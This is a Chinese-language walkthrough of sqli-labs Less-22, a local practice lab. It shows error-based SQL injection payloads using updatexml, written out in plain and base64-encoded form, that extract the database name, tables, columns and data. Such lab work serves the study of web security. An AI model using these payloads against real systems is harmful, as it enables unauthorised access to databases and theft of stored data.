前言 {#前言}

本题跟上题做法相似，只是符号的区别

前期准备 {#前期准备}

开启phpstudy，开启apache服务以及mysql服务

实验环节 {#实验环节}

浏览器访问Less-22 {#浏览器访问Less-22}

http://192.168.199.135/sqli-labs-master/Less-22/

进行简单闭合，页面正常显示 {#进行简单闭合，页面正常显示}

Dumb" -- xz
base64编码后：RHVtYiIgLS0geHo=

判断库名 {#判断库名}

Dumb" and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后：RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgZGF0YWJhc2UoKSwgMHg3ZSksIDEpLS0geHo=

判断表名 {#判断表名}

Dumb"and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后：RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==

判断列名 {#判断列名}

Dumb"and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后：RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgLS0geHo=

判断数据 {#判断数据}

Dumb"and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后：RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=